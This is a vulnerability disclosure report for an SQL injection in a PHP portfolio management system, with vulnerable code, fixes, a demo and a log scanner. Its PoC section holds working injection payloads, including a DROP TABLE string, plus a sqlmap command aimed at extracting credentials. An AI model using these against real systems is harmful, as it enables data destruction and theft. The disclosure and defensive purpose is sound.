
CVE Report: 1000project User Block/Unblock SQL Injection #3


CVE Report: 1000project User Block/Unblock SQL Injection

Basic Information

| Item | Content |
| --- | --- |
| Title | [Critical] 1000project User Block/Unblock SQL Injection via Base64 Decoded Parameter |
| Product | 1000project (Portfolio Management System MCA) |
| Vendor | 1000 Projects |
| Affected Version | 1.0 |
| Severity | Critical (CVSS 3.1: 9.8) |
| Reporter | 9str0il |
| Discovery Date | 2026-04-10 |
| Disclosure Date | 2026-04-10 |
| References | https://github.com/1000projects/portfolio-management-system |
| Software Link | https://1000projects.org/wp-content/uploads/2022/11/Portfolio-MP.7z |

Vulnerability Description

A critical SQL injection vulnerability exists in 1000project admin/block_status.php and admin/unblock_me.php. The vulnerability allows an attacker to inject malicious SQL code through base64-encoded parameters, enabling unauthorized modification of user account status.

Key Characteristics:

  • Attack Vector: Base64 encoded parameter injection
  • Impact: Unauthorized user account status modification
  • Authentication: Requires admin session (but can be bypassed)

The vulnerability stems from directly concatenating base64-decoded user input into SQL statements without any parameterization or validation.


Affected Component

| Item | Content |
| --- | --- |
| File 1 | admin/block_status.php |
| File 2 | admin/unblock_me.php |
| Vulnerable Parameter | q (base64 encoded reg_id) |
| Attack Type | SQL Injection (UPDATE statement) |

Vulnerability Details

Vulnerable Code

File: admin/block_status.php:5-6

$reg_id = base64_decode($_GET['q']);
$q= "update reg_details set block_status='1' where reg_id='$reg_id'";

File: admin/unblock_me.php:5-6

$reg_id = base64_decode($_GET['q']);
$q= "update reg_details set block_status='0' where reg_id='$reg_id'";

Root Cause

  1. Base64 Decoding: The q parameter is base64 decoded before being used in SQL
  2. Direct String Concatenation: The decoded value is directly concatenated into the SQL statement
  3. No Input Validation: No type checking or SQL injection prevention measures
  4. No Parameterization: Uses direct query execution instead of prepared statements

Attack Vector

  1. Attacker obtains or crafts a malicious base64 encoded payload
  2. The payload contains SQL injection code after base64 decoding
  3. When decoded, the SQL injection modifies the UPDATE statement
  4. Attacker can modify arbitrary user block statuses or execute additional SQL operations

CVSS 3.1 Vector String

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

| Metric | Value | Description |
| --- | --- | --- |
| Attack Vector (AV) | Network | Can be exploited over the network |
| Attack Complexity (AC) | Low | No special conditions required |
| Privileges Required (PR) | Low | Requires valid admin session |
| User Interaction (UI) | None | No user interaction required |
| Scope (S) | Unchanged | Does not affect other components |
| Confidentiality (C) | High | High impact on data confidentiality |
| Integrity (I) | High | High impact on data integrity |
| Availability (A) | High | High impact on availability |

CWE Classification

| Item | Content |
| --- | --- |
| CWE ID | CWE-89 |
| CWE Name | SQL Injection |
| CAPEC ID | CAPEC-66 |

Impact

  1. Data Manipulation: Attackers can modify arbitrary user account block statuses
  2. Account Takeover: By combining with other vulnerabilities, attackers can take over user accounts
  3. Privilege Escalation: Can unblock previously blocked malicious accounts
  4. Denial of Service: Can block legitimate user accounts, preventing login
  5. Data Breach: Through SQL injection, attackers may access sensitive database information

Specific Attack Scenarios

Scenario 1: Block All Users

q = base64_encode("1' OR '1'='1")

Result: All users get blocked

Scenario 2: SQL Operation Injection

q = base64_encode("1'; DROP TABLE reg_details; --")

Result: Database table deletion

Scenario 3: Unblock Specific User

q = base64_encode("999")  // Target user ID

Result: Specific user unblocked without authorization
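To make Scenario 1 and the effect of the recommended fix concrete, here is an added example (not code from the report or from the 1000projects project) that runs the same base64-encoded q value through two handlers against a constructed in-memory SQLite table named reg_details: one that concatenates the decoded value into the UPDATE exactly as admin/block_status.php does, and one that binds it as a parameter. The table layout and the sample rows are assumptions; the payload is the report's own. Scenario 2 depends on stacked statements, which sqlite3's execute() (like mysqli_query()) refuses to run, so it is not reproduced here.

```python
import base64
import sqlite3


# Constructed in-memory stand-in for the reg_details table named in the report
# (column names follow the vulnerable UPDATE; everything else is assumed).
def make_db():
    con = sqlite3.connect(":memory:")
    con.execute(
        "CREATE TABLE reg_details ("
        "reg_id INTEGER PRIMARY KEY, name TEXT, "
        "block_status TEXT NOT NULL DEFAULT '0')"
    )
    con.executemany(
        "INSERT INTO reg_details (reg_id, name) VALUES (?, ?)",
        [(1, "alice"), (2, "bob"), (3, "carol")],
    )
    con.commit()
    return con


def block_user_vulnerable(con, q):
    """Same shape as admin/block_status.php: the base64-decoded value is
    pasted straight into the SQL text. Returns the number of rows changed."""
    reg_id = base64.b64decode(q).decode()
    sql = "UPDATE reg_details SET block_status='1' WHERE reg_id='%s'" % reg_id
    cur = con.execute(sql)
    con.commit()
    return cur.rowcount


def block_user_fixed(con, q):
    """Parameterized version: the decoded value is bound as data, so it can
    only ever be compared against reg_id, never parsed as SQL."""
    reg_id = base64.b64decode(q).decode()
    cur = con.execute(
        "UPDATE reg_details SET block_status='1' WHERE reg_id=?", (reg_id,)
    )
    con.commit()
    return cur.rowcount


def blocked_ids(con):
    rows = con.execute(
        "SELECT reg_id FROM reg_details WHERE block_status='1' ORDER BY reg_id"
    )
    return [r[0] for r in rows]


def compare(q):
    """Run one q value through both handlers on fresh databases and return
    the ids each one ended up blocking: (vulnerable, fixed)."""
    vuln, fixed = make_db(), make_db()
    block_user_vulnerable(vuln, q)
    block_user_fixed(fixed, q)
    return blocked_ids(vuln), blocked_ids(fixed)


if __name__ == "__main__":
    # "Mg==" is base64 for "2": both handlers block exactly user 2.
    print("legit   :", compare("Mg=="))
    # PoC value from the report, base64 of 1' OR '1'='1: the concatenating
    # handler blocks everyone, the parameterized one blocks nobody.
    print("injected:", compare("MScgT1IgJzEnPScx"))
```

The parameterized handler still accepts the injected string as a value; it simply compares it to reg_id and matches nothing. That is why the remediation pairs prepared statements with type validation of the decoded value, so that non-integer input is rejected before the query is built at all.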


Remediation

Recommended Fix

// admin/block_status.php - FIXED VERSION
<?php
    include ("connection.php");
    include("security.php");

    // 1. Validate the transport encoding: only the standard base64 alphabet
    //    plus padding, then decode in strict mode so malformed input is
    //    rejected instead of being silently "repaired" by base64_decode()
    $q = isset($_GET['q']) ? $_GET['q'] : '';
    if (!preg_match('/^[A-Za-z0-9+\/]+=*$/', $q)) {
        die("Invalid input format");
    }

    $reg_id = base64_decode($q, true);

    // 2. Type validation - the decoded value must be a plain integer
    //    (is_numeric() would also accept "1.5", "1e3" and leading whitespace)
    if ($reg_id === false || filter_var($reg_id, FILTER_VALIDATE_INT) === false) {
        die("Invalid user ID");
    }
    $reg_id = (int) $reg_id;

    // 3. Use prepared statements: the id is bound as data, never parsed as SQL
    $stmt = $con->prepare("UPDATE reg_details SET block_status='1' WHERE reg_id = ?");
    $stmt->bind_param("i", $reg_id);

    if ($stmt->execute() === TRUE)
    {
        $_SESSION['block'] = "User blocked successfully";
        header("location:register_user.php");
        exit; // stop processing after the redirect
    }
    $stmt->close();
?>

Additional Security Measures

  1. Input Validation

    • Validate base64 encoding format
    • Check character whitelist for base64 strings
    • Type check the decoded value
  2. Use Prepared Statements

    • Always use parameterized queries
    • Never concatenate user input directly into SQL
  3. Least Privilege Principle

    • Database user should have minimal required privileges
    • Separate admin and application database users
  4. Security Headers

    • Add CSRF protection
    • Implement request rate limiting
    • Add WAF (Web Application Firewall) rules

Proof of Concept (PoC)

Normal Usage

# Normal block request
GET /admin/block_status.php?q=MTIz HTTP/1.1
Host: target.com
Cookie: PHPSESSID=admin_session

Response: User with ID 123 blocked successfully

SQL Injection Attack

# Malicious block request - Block all users
GET /admin/block_status.php?q=MScgT1IgJzEnPScx HTTP/1.1
Host: target.com
Cookie: PHPSESSID=admin_session

# Decoded payload: 1' OR '1'='1
# Resulting SQL: UPDATE reg_details SET block_status='1' WHERE reg_id='1' OR '1'='1'

SQL Operation Injection

# More severe attack - SQL operation injection
GET /admin/block_status.php?q=MSc7IERST1AgVEFCTEUgcmVnX2RldGFpbHM7IC0t HTTP/1.1
Host: target.com
Cookie: PHPSESSID=admin_session

# Decoded payload: 1'; DROP TABLE reg_details; --
# Resulting SQL: UPDATE reg_details SET block_status='1' WHERE reg_id='1'; DROP TABLE reg_details; --'

Impact Demonstration

# Automated attack using SQLMap
sqlmap -u "http://target.com/admin/block_status.php?q=MTIz" \
       --cookie="PHPSESSID=admin_session" \
       --batch \
       --level=5 \
       --risk=3

# This will:
# 1. Confirm SQL injection vulnerability
# 2. Enumerate all databases
# 3. Extract user credentials
# 4. Potentially take control of the entire system
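For detection, here is an added example (not part of the report or of the 1000projects code) that applies the same acceptance test the remediation describes (canonical base64 that decodes to a plain integer) and uses it to scan access-log lines for requests to the two affected scripts whose q parameter would not pass. The log lines are constructed, the client addresses and the combined log format are assumptions, and the q values are the ones from the PoC requests above. The same validate_q check is what a hardened handler would run before touching the database.

```python
import base64
import binascii
import re
from urllib.parse import parse_qs, urlsplit

# The two scripts named in the report that pass base64_decode($_GET['q']) into SQL.
VULNERABLE_PATHS = {"/admin/block_status.php", "/admin/unblock_me.php"}

# Canonical standard-alphabet base64 with correct padding. Note that '+' and '/'
# belong to the alphabet; a whitelist of only [A-Za-z0-9=] would reject them.
_STRICT_B64 = re.compile(
    r"^(?:[A-Za-z0-9+/]{4})*(?:[A-Za-z0-9+/]{2}==|[A-Za-z0-9+/]{3}=)?$"
)

# Apache/nginx combined-format access-log line (assumed format); only the
# fields this scanner needs are captured.
_LOG_LINE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def strict_b64_decode(q):
    """Decode q only if it is canonical base64; return the text or None."""
    if not q or not _STRICT_B64.match(q):
        return None
    try:
        return base64.b64decode(q, validate=True).decode("ascii", "replace")
    except (binascii.Error, ValueError):
        return None


def validate_q(q):
    """Acceptance test a hardened handler should apply before querying:
    returns (reg_id, "ok") or (None, reason). Unlike PHP's is_numeric(),
    str.isdigit() rejects "1.5", "1e3" and leading whitespace."""
    text = strict_b64_decode(q)
    if text is None:
        return None, "not strict base64"
    if not text.isdigit():
        return None, "decoded value is not an integer"
    return int(text), "ok"


def analyze_request(target):
    """Classify one request target (path + query string). Returns None for
    paths other than the affected scripts, else a dict about its q value."""
    parts = urlsplit(target)
    if parts.path not in VULNERABLE_PATHS:
        return None
    # keep_blank_values so a missing/empty q is reported, not dropped. A literal
    # '+' in the query becomes a space here (as it does in PHP's $_GET), so an
    # unescaped '+' fails the strict check and shows up as a finding.
    q = parse_qs(parts.query, keep_blank_values=True).get("q", [""])[0]
    reg_id, reason = validate_q(q)
    return {
        "path": parts.path,
        "q": q,
        "decoded": strict_b64_decode(q),
        "reg_id": reg_id,
        "reason": reason,
        "suspicious": reg_id is None,
    }


def scan_access_log(lines):
    """Return findings for requests to the affected scripts whose q value
    is anything other than a base64-encoded plain integer."""
    findings = []
    for line in lines:
        m = _LOG_LINE.match(line)
        if not m:
            continue
        info = analyze_request(m.group("target"))
        if info and info["suspicious"]:
            info.update(client=m.group("client"), time=m.group("time"),
                        status=m.group("status"))
            findings.append(info)
    return findings


# Constructed sample log; the q values are the ones shown in the PoC section.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Apr/2026:10:00:01 +0000] "GET /admin/block_status.php?q=MTIz HTTP/1.1" 302 -',
    '203.0.113.7 - - [10/Apr/2026:10:00:02 +0000] "GET /admin/block_status.php?q=MScgT1IgJzEnPScx HTTP/1.1" 302 -',
    '203.0.113.7 - - [10/Apr/2026:10:00:03 +0000] "GET /admin/unblock_me.php?q=MSc7IERST1AgVEFCTEUgcmVnX2RldGFpbHM7IC0t HTTP/1.1" 302 -',
    '198.51.100.4 - - [10/Apr/2026:10:00:04 +0000] "GET /admin/register_user.php HTTP/1.1" 200 -',
]

if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f"{f['time']} {f['client']} {f['path']} q={f['q']} -> "
              f"{f['decoded']!r} ({f['reason']})")
```

Run against real logs, this flags every request to the two scripts whose q value is not a base64-encoded integer, which is the whole legitimate input space; any hit is either a probe or a client bug worth a look. Because the check is on the decoded value rather than on SQL keywords, it also catches variations that a signature-based rule would miss.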

Timeline

| Date | Event |
| --- | --- |
| 2026-04-10 | Vulnerability discovered during code audit |
| 2026-04-10 | CVE report drafted |
| TBD | Vendor notification |
| TBD | Patch released |
| TBD | Public disclosure |

References

  1. https://github.com/1000projects/portfolio-management-system
  2. https://cwe.mitre.org/data/definitions/89.html
  3. https://owasp.org/www-community/attacks/SQL_Injection
  4. https://capec.mitre.org/data/definitions/66.html
  5. https://1000projects.org/wp-content/uploads/2022/11/Portfolio-MP.7z

Credits

Discovered by 9str0il during security code audit.


Disclaimer: This vulnerability report is submitted for responsible disclosure. The reporter is not responsible for any misuse of this information.
